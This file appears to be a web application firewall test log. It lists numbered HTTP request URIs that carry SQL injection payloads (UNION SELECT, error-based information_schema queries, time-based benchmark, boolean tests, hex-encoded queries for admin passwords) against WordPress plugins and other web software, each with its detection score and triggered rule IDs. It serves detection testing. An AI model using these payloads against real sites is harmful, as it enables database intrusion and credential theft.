Packet [405]	Uri [/wp-admin/admin-ajax.php?action=myextractXML&vid=1::/wp-admin/admin.php?page=newplaylist&playlistId=1::/wp-admin/admin.php?page=newvideo&videoId=1]	PLmin [4]	Score [0]	Nattacks [2]	[920273]	[942432]
Packet [407]	Uri [/bacula-web/joblogs.php?jobid=991%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [408]	Uri [/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20]	PLmin [2]	Score [10]	Nattacks [12]	[920273]	[942100]	[942160]	[942150]	[942300]	[942410]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [409]	Uri [/wp-admin/admin.php?page=wrp-add-new&id=2%20union%20select%201,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18]	PLmin [2]	Score [20]	Nattacks [15]	[920273]	[942100]	[942140]	[942190]	[942360]	[942150]	[942260]	[942310]	[942361]	[942410]	[942480]	[942431]	[942432]	[949110]	[980130]
Packet [410]	Uri [/acms/admin/uploads.php?id=1%20and(select%201%20FROM(select%20%20count(*),concat((select%20(select%20concat(database()))%20FROM%20%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20%20information_schema.tables%20GROUP%20BY%20x)a)]	PLmin [2]	Score [15]	Nattacks [19]	[920273]	[933161]	[942100]	[942140]	[942190]	[942150]	[942200]	[942260]	[942310]	[942330]	[942380]	[942410]	[942480]	[942430]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [411]	Uri [/FoeCMS/index.php?i=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [412]	Uri [/ads.php?catid=4%27a1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [413]	Uri [/categories-x.php?getcategories&sortkey=name)%20limit%201;--::/categories-x.php?getcategories&sortkey=name)%20limit%205;--]	PLmin [2]	Score [10]	Nattacks [9]	[920273]	[921180]	[942100]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [414]	Uri [/videocat.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Odau::/single.php?url=test'%20AND%203383=3383%20AND%20'Odau'='Odau]	PLmin [2]	Score [5]	Nattacks [13]	[920273]	[941340]	[942100]	[942130]	[942180]	[942330]	[942340]	[942400]	[942430]	[942431]	[942432]	[949110]	[980130]
Packet [415]	Uri [/modules/glossaire/glossaire-aff.php?lettre=A%20%and%20SELECT%20*%20FROM%20table1]	PLmin [2]	Score [3]	Nattacks [6]	[920220]	[920230]	[920272]	[920273]	[942200]	[942432]
Packet [417]	Uri [/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin::/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0]	PLmin [2]	Score [35]	Nattacks [14]	[920273]	[921180]	[942100]	[942190]	[942270]	[942360]	[942200]	[942260]	[942361]	[942480]	[942450]	[942432]	[949110]	[980130]
Packet [418]	Uri [/site/default.asp?TroncoID=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [419]	Uri [/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942390]	[942480]	[942432]	[949110]	[980130]
Packet [420]	Uri [/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,versi%20on%28%29,3,4,5,6,7,8,9]	PLmin [2]	Score [10]	Nattacks [8]	[920273]	[942100]	[942190]	[942260]	[942480]	[942432]	[949110]	[980130]
Packet [421]	Uri [/download.php?category=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
